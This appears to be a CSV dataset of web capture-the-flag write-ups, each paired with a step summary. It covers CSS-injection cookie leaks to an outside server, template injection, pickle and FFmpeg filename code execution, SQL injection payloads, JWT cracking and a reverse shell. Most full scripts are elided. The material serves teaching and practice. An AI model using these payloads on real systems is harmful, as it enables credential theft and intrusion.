"text","summary"
"Description: ""Wow that's a pretty color! Don't you think? Pick your favourite and show it to the admin on /admin.""

This is a CSS injection challenge (of course you can do `<<script >>` but the intended solution is CSS injection). In the page you open, you can see that there is an input box where you can enter a color, which gets applied as you click on submit. There's also a hidden field `password`, the value of which is taken from the cookie. Since the string is interpolated, you can do something like `blue}; input[type=""password""][value^=""c""] {background-image: url('https://example.com?c');`, which will send a request to `example.com?c`, if the first character of the password is `c`.

You may pass a long list of such CSS selectors, for all letters.

This will therefore tell you which character matched, which you can see on your own server (here example.com). Once the first character is leaked, you can go ahead and try to leak the next character.

An so on, until you find the entire password. You can test this on your browser by storing a cookie called `password` with the value `csictf`. Now pass the following to get a request on your server (replace example.com with your server).

Pass these payloads to `/admin` and you can leak the admin cookie `password`, which is the flag.

Using this method, you can progressively leak the entire password and obtain the flag.
","Recognize the challenge as a CSS injection challenge.
Create a series of CSS selectors to leak the characters of the hidden `password` field.
Set up a server to receive the leaked characters (e.g., example.com).
Inject the CSS selectors into the input box and submit the form.
Monitor the server to collect the leaked characters and progressively reconstruct the password.
Obtain the flag by leaking the admin cookie `password`.
"
"Description ""You may think I walk with no 'name' because it can be changed whenever I want. I am a 'person' whose 'secret' can never be found. Can you find this 'person's 'secret'?
(I love you 8000.)""

This challenge involves exploiting the server script through Tornado template injection to obtain the cookie secret and forging a signed cookie to access the flag.

- The server script runs on `http://chall.csivit.com:30279/`. Input is taken as the ""icecream"" value. 
 
- A secure cookie is being set and compared to print a flag value. In tornado, signed cookies contain the encoded value of the cookie
  alongwith a timestamp and an HMAC signature. Such cookies are supported by the set_secure_cookie and get_secure_cookie methods which require a specific secret key: cookie_secret.

- Upon visiting `http://chall.csivit.com:30279/?icecream={{globals()}}`, you see something useful:
`'application': <tornado.web.Application object at 0x7f2976579750>`

- You now know that the name of the variable `tornado.web.Application(...)` is `application`.

- Run the server script with the exploit payload `http://chall.csivit.com:30279/?icecream={{application.settings[""cookie_secret""]}}` to get the cookie_secret value `MangoDB` displayed on the website.
  
- Replace the value of the secure cookie `admin` to the required comparison value `true` to obtain a signed cookie on the browser. Now, replace the signed cookie generated upon running the server script with the one obtained after the secure cookie value was set to `true`. This results in a cookie which looks like the following. Note `dHJ1ZQ==` is base64 for `true`.
""2|1:0|10:1594808471|5:admin|8:dHJ1ZQ==|5da7d1e446451e825e42001e7f07360e2e2e77c9c68b14fca1a517259712cdac""

- Upon reloading the server script, the text on the website would change from `Unfortunately, you aren't worthy` to the flag value.
","Visit the server script at `http://chall.csivit.com:30279/`.
Exploit Tornado template injection with `http://chall.csivit.com:30279/?icecream={{globals()}}` to find the `application` variable.
Use the payload `http://chall.csivit.com:30279/?icecream={{application.settings[""cookie_secret""]}}` to obtain the `cookie_secret` value `MangoDB`.
Set the secure cookie `admin` to `true` and generate a signed cookie in the browser.
Replace the signed cookie generated upon running the server script with the one obtained after setting the secure cookie value to true.
Reload the server script to see the flag value on the website.
"
"In this challenge, you can see the `index.php` code by default.

So, you see that we have to match the value of `hash` and `target`. It is checked that the `hash` param does not equal `10932435112`, but again it checks that the sha1 hash of `hash` is equal to that of `10932435112`. We know that the sha1 hashes will not match ever, so it's not a bruteforce challenge. Later, you notice that the `$hash` and the `$target` and matched using `==` and not `====`. `==` is vulnerable to type juggling!

If you see the hash of `10932435112`, it starts with `0e...`. So any other hash which starts with `0e` will match this with `==`, since `==` does not check types, so these will be treated as numbers. So, you have to bruteforce considerably lesser amount of values. 

You would find a lot of matches.

Pass any of these with the GET param `hash`, and you get the flag.
","Observe that the `index.php` code checks that the `hash` parameter does not equal `10932435112`, and the sha1 hash of `hash` equals that of `10932435112`.
Notice that `$hash` and `$target` are compared using `==`, which is vulnerable to type juggling.
Find a hash starting with `0e` that matches the sha1 hash of `10932435112` using `==`.
Pass one of these matching values with the GET parameter `hash` to obtain the flag.
"
"When you look at the documentation for the source for the `flask_caching` module, you can optionally store a python pickle in the redis by prepending it with `'!'`. You can use python pickles for RCE, when the caching modules uses `pickle.load()` to load the cached data.

Set up a netcat listener on your server and run the following script with your IP and PORT.
[Python script: Create a payload for RCE and send it to the server]

On your netcat listener, you would get the flag.
[HTTP POST request with the flag]
","Analyzed `flask_caching` module documentation and found the option to store python pickle in redis with '!' prefix.
Recognized that python pickles can be used for RCE when `pickle.load()` is used to load cached data.
Set up a netcat listener on the server.
Ran the provided Python script with server IP and PORT to create and send RCE payload.
Received the flag on the netcat listener through an HTTP POST request.
"
"The critical line in the code is:
[Python code: Use subprocess.Popen to call FFmpeg]

Here, you can perform Remote Code Execution (RCE) with the file name. The idea is to grep the flag from the main.py file and write it on the image to which the GIF is going to be converted. This can be done with the -vf drawtext=... option. The payload used is:
[Payload: Include grep and drawtext options in the file name]

When you upload a GIF with this payload as the file name, you will receive a resulting PNG with the flag written on it.
","Identified critical line in code using subprocess.Popen to call FFmpeg.
Recognized potential for Remote Code Execution (RCE) with file name.
Crafted a payload using -vf drawtext=... option to grep the flag and write it on the output image.
Uploaded a GIF with the payload as the file name.
Received a resulting PNG with the flag written on it.
"
"In this challenge, you see a bunch of captcha's floating around on your screen, and the goal is to successfully get 5 captchas. There's many ways to solve this, here's what was done:

When you see the source, this is the function which creates the captchas and makes them move:
[JavaScript code: Captcha creation and movement function]

To make it easier to solve the captchas, modify this function using your browser's developer tools, removing the part where it runs the loop, which is responsible for moving the captchas.
[Modified JavaScript code: Captcha creation function without movement]

Now, you can manually add 5 captchas and get them. Just call the function `addCaptcha()` and keep clicking the boxes. When you're done with 5, click on `GET FLAG`, and copy the flag from the screen!
","Analyzed source code and found the JavaScript function responsible for captcha creation and movement.
Modified the function using browser's developer tools to remove the movement loop.
Manually called `addCaptcha()` function to add 5 captchas without movement.
Clicked on the boxes to solve the captchas.
Clicked on `GET FLAG` and copied the flag from the screen.
"
"The challenge gives us the following text:
""Normal fries are nice, but everything's better with a curl in it. The flag is right in front of you.""

Upon opening the link, an image is displayed, which hints at Sweden. So, the solution involves setting the language headers to Swedish using a ""curl"" command.
[Shell command: Set Accept-Language header to Swedish]

Executing this command returns the flag.
","Received challenge text hinting at using a ""curl"" command and a connection to Sweden.
Set the Accept-Language header to Swedish using the curl command provided.
Executed the command and obtained the flag.
"
"The challenge gives us the following text:
""Normal fries are nice, but everything's better with a curl in it. Why do logos make things so recognizable?""

Upon opening the link, an image is displayed that shows the logos of Xbox and Linux. This is viewed on a Windows device.

To change the User-Agent to Linux, use the following command:
[Shell command: Set User-Agent header to Linux]

Executing this command returns a response with the Linux logo gone.

Next, set the User-Agent to both Linux and Xbox:
[Shell command: Set User-Agent header to Linux Xbox]

Executing this command gives the flag inside the body of the page.
","Received challenge text hinting at changing User-Agent and the presence of logos.
Opened the provided link, displaying Xbox and Linux logos on a Windows device.
Changed the User-Agent to Linux using the provided shell command, removing the Linux logo from the response.
Set the User-Agent to both Linux and Xbox using another shell command.
Executed the command and found the flag inside the page body.
"
"The challenge provides the following hint: ""Normal fries are nice, but everything's better with a curl in it. I'm with you, every step of the way.""

Upon opening the link, an image is displayed. To solve the challenge, a series of curl commands were executed with various headers, cookies, and JSON data. Here's the process:

Change the method to POST and send a request to the URL.

Set the Referer header to Google and send a request to the URL. In response, you receive a hint to attend a dinner party hosted by dscvit.

Set the Host header to dscvit.com and send a request to the URL. The response mentions potatoes, carrots, milk, and cookies.

Set the user cookie to ""root"" and send a request to the URL, as potatoes and carrots are root vegetables. The response contains a JSON-related hint.

Set the Content-Type header to application/json, include JSON data, and send a request to the URL. The response points out that ""messi"" is required in the JSON data.

Add ""messi"" to the JSON data and send a request to the URL. The response asks for the club Messi is in.
Change the ""messi"" value to ""psg"" and send a request to the URL, since Messi is playing for PSG at the time.

After executing the final command, the flag is returned.","Changed the method to POST and sent a request to the URL.
Set the Referer header to Google and received a hint about attending a dinner party.
Set the Host header to dscvit.com and received a response mentioning various ingredients.
Set the user cookie to ""root"" and received a JSON-related hint.
Set the Content-Type header to application/json, included JSON data, and received a hint about needing ""messi"".
Added ""messi"" to the JSON data and received a response asking for Messi's club.
Changed the ""messi"" value to ""psg"" and sent a request to the URL.
Obtained the flag in the response.
"
"This Python script demonstrates an SQL Injection attack against the web application's database to solve the ""Taxi Union"" and ""Gate Keeper"" challenges. The script performs the following steps:
[Import the necessary libraries and initialize the variables.
Set the appropriate URL, check string, key, and column values based on the selected challenge (either ""Taxi Union"" or ""Gate Keeper"").
Iterate through each character in the domain (letters, digits, and special characters) while searching for the flag.
For each character, create an SQL injection payload that checks if the current flag value concatenated with the character is a prefix of the targeted column's value.
Send an HTTP POST request to the URL with the payload as the form data.
If the check string is found in the response, it means the character is part of the flag. Add the character to the flag and continue iterating through the domain.
Repeat the process until the entire flag is discovered.]

The Python script helps to find the flag by exploiting SQL injection vulnerability in the web application.
","Import necessary libraries and initialize variables.
Set URL, check string, key, and column values for the chosen challenge (""Taxi Union"" or ""Gate Keeper"").
Iterate through each character in the domain while searching for the flag.
Create an SQL injection payload for each character, checking if it's a prefix of the targeted column's value.
Send an HTTP POST request with the payload as form data.
If the check string is found in the response, add the character to the flag and continue iterating.
Repeat the process until the entire flag is discovered using the Python script's SQL injection exploit.
"
"The challenge begins with the given text: ""There is nothing here I promise! ;)""

Upon opening the link, an image is displayed. By checking the network tab, a response header with a specific string is found. A curl request is then sent, setting the cookie to the given string.

The response contains another string. A new curl request is sent with this new string as the cookie.

To automate this process, a Python script is written:
[Define the initial URL and the first flag value.
Create a loop that continues until the final flag value, 'EOF', is found.
In each iteration, send an HTTP GET request to the URL with the current flag value as a cookie.
Append the received string to the list of flags and continue iterating.
Once the loop is finished, print the received strings.]

The output contains multiple strings, which appear to be MD5 hashes. After decoding these hashes, a sequence of characters is obtained, which is the flag.
","Opened the provided link and found a response header with a specific string.
Sent a curl request setting the cookie to the given string and received another string in response.
Sent a new curl request with the new string as the cookie.
Wrote a Python script to automate the process, iteratively sending HTTP GET requests with flag values as cookies.
Obtained multiple strings from the output, which were MD5 hashes.
Decoded the MD5 hashes to reveal a sequence of characters, which is the flag.
"
"This solution demonstrates a SQL Injection attack to solve a CTF challenge. The script also works for the `Gate Keeper` challenge. Here's a high-level explanation of the Python script:
[Import the necessary libraries: `requests` and `string`.
Initialize an empty `flag` variable, and define the search domain containing all possible characters.
Set the challenge, URL, check, key, and column variables based on the challenge being solved (either ""taxi union"" or ""gate keeper"").
Enter an infinite loop that iterates through each character in the search domain.
For each character, create a payload containing a SQL injection query using the current flag and character.
Send an HTTP POST request to the URL with the payload as the data.
Check if the expected response text is found in the received response.
If the expected response is found, add the character to the flag and print it.
Break the loop once the flag is found.]

The script automates the process of testing various payloads to exploit the SQL Injection vulnerability and retrieve the flag.
","Import necessary libraries (`requests` and `string`) and initialize an empty flag variable.
Define the search domain containing all possible characters and set challenge-specific variables.
Enter an infinite loop iterating through each character in the search domain.
Create a payload containing a SQL injection query using the current flag and character.
Send an HTTP POST request to the URL with the payload as the data.
Check if the expected response text is found in the received response.
If the expected response is found, add the character to the flag and print it.
Break the loop once the flag is found, exploiting the SQL Injection vulnerability.
"
"When you examine the source code, you'll notice the application uses `bodyParser.urlencoded` with `extended: true`. This allows arrays and objects to be passed in the request body. In the `/login` POST route, the output has not been stringified, so it is possible to pass an object in the query statement.
[JavaScript code: Configure bodyParser and create SQL query]

The exploit is to pass an object as the password parameter, with a known attribute. This causes the SQL query to be evaluated in a way that allows logging in without knowing the correct password. We'll refer to the official `mysql` docs for more information on how objects are converted into comma-separated attributes in SQL queries.

The final payload for this exploit is:
[HTTP POST request: Send payload with object as password]

From here, you can just take the cookie you received, and use that to visit `/flag`. Alternatively, you can use a Python script to automate the process:
[Python script: Send payload, get the flag, and print it]

You can run this script and use `grep` to find the flag.
","Examine the source code and identify the use of `bodyParser.urlencoded` with `extended: true`.
Notice that the output has not been stringified, allowing objects to be passed in the query statement.
Create an exploit by passing an object as the password parameter, causing the SQL query to be evaluated in a way that allows logging in without knowing the correct password.
Consult the official `mysql` docs for more information on object conversion in SQL queries.
Construct the final payload and send it as an HTTP POST request.
Use the received cookie to visit `/flag` or automate the process with a Python script.
Run the script and use `grep` to find the flag.
"
"When you visit the website, you find that there's a cookie containing a JWT. It's hashed using `HS256`. The JWT secret was brute-forced using `rockyou.txt` and John The Ripper, which revealed the secret as `supersecret`. Using this secret, a JWT with `username: admin` was created and added to the cookie, logging in as admin.

Visiting a random route starting with `/admin/` that throws a 404 error, it was observed that there's scope for template injection in the 404 page. By climbing up the Python MRO using `__class__` and `__bases__`, etc., a list of all available classes was found. At index 405, the `subprocess.Popen` class was discovered.

Using this class, a reverse shell was spawned by sending a specially crafted URL. A netcat listener was started on the server at the specified port, which ultimately led to gaining a shell.

Upon listing the files and reading the content of `flag.txt`.
","Visited website and found JWT hashed with HS256 in a cookie.
Brute-forced JWT secret using rockyou.txt and John The Ripper, revealing secret as 'supersecret'.
Created a JWT with 'username: admin' and added it to the cookie to log in as admin.
Found template injection vulnerability in the 404 page of an /admin/ route.
Explored Python MRO and discovered the subprocess.Popen class.
Spawned a reverse shell using a crafted URL and netcat listener.
Gained shell access and read the content of 'flag.txt'.
"
"The challenge is very simple once you know what to do.
This is the hint:
""We will only give our flag to our Agent 95! He is still running an old version of Windows...""

We assume Agent 95 uses Windows 95. So just change the `User-Agent` header to `Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)`.

We use a Python script:
[Python code: using `requests` to send a GET with the `User-Agent` header]

In the response, you got the flag.
","Understand the hint and assume Agent 95 uses Windows 95.
Change the `User-Agent` header to `Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)`.
Use a Python script with the `requests` library to send a GET request with the modified `User-Agent` header.
Receive the response containing the flag.
"
"Well, if you happen to look at the local storage, you'll get the flag directly. But that's not how we got it because we're stupid. So, here's what we did.

You see a JS file in the sources: `jquery.jscroll2.js`. Now, to understand what exactly it does, we first convert the huge list on `line 1` from `hex` to `string` to be able to make sense of it. So let's convert it using a script written in `python2`.

Once you convert it, you will see some meaningful strings such as `localStorage`, `setItem`, `data`, `defaults`, `extend`, `function`, etc..
Now we can try to make sense of the rest of the code.

We see an interesting line. Now that we have the strings figured out:
[JavaScript code: stores the decoded base64 string in local storage with the key 'flag']

So the script basically converst the `base64` string `SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9` and stores it in local storage with the key `flag`. Well, now you can just check the local storage, or just convert this string to ASCII using BASH.
","Examine the local storage to find the flag directly (alternative solution).
Find and analyze the `jquery.jscroll2.js` file in the sources.
Convert the hex list on line 1 to a string using a Python script.
Understand the decoded JavaScript code and identify the line that stores the decoded base64 string in the local storage with the key 'flag'.
Check the local storage or convert the base64 string to ASCII using BASH to get the flag.
"
"Press `Ctrl + U` on your browser to view the source code of the `HTML` file. Search for `flag{...}`. 
[HTML source code with flag]
","Press `Ctrl + U` to view the source code of the HTML file.
Search for `flag{...}` in the source code.
"
"This is a beginner SQL Injection challenge. To retrieve the flag, you need to inject a malicious SQL query into the login form.

Simply pass the username and the password as ' or 1=1 -- , which will be interpreted as a SQL query that always returns true, and comment out the rest of the query with the -- symbol. This will cause the server to execute the SQL query as if you had provided valid login credentials, resulting in an alert box displaying the flag.
","Recognize the challenge as a beginner SQL Injection.
Inject a malicious SQL query into the login form using the username and password as ' or 1=1 -- .
The server executes the SQL query as if valid login credentials were provided.
An alert box displays the flag.
"
"[This challenge involves exploiting a vulnerability in the `generateToken` function in a JavaScript file. The function generates a token for a given `username`, where the `username` is included as a string in a JSON object that is encrypted using `aes-192-cbc`. However, the function forms the JSON object in a way that allows the "" character to be closed with the help of the string passed in the `username` parameter, and sets the `member` field to a non-zero value.]

You really just need to notice this function. Notice, the token is not created like `token.username = username`. It's formed in the following way:
```
const token = `{""integrity"":""${INTEGRITY}"",""member"":0,""username"":""${username}""}`
```

To exploit the vulnerability, we can pass the `username` as `"",""member"":""1` which will close the `""` character and set `member` to `1`. Then, we can visit `/api/flag` to get the flag in JSON format.
","Identify the vulnerability in the `generateToken` function, which creates a token in an exploitable manner.
Pass the `username` as `"",""member"":""1`, closing the `""` character and setting `member` to `1`.
Visit `/api/flag` to get the flag in JSON format.
"
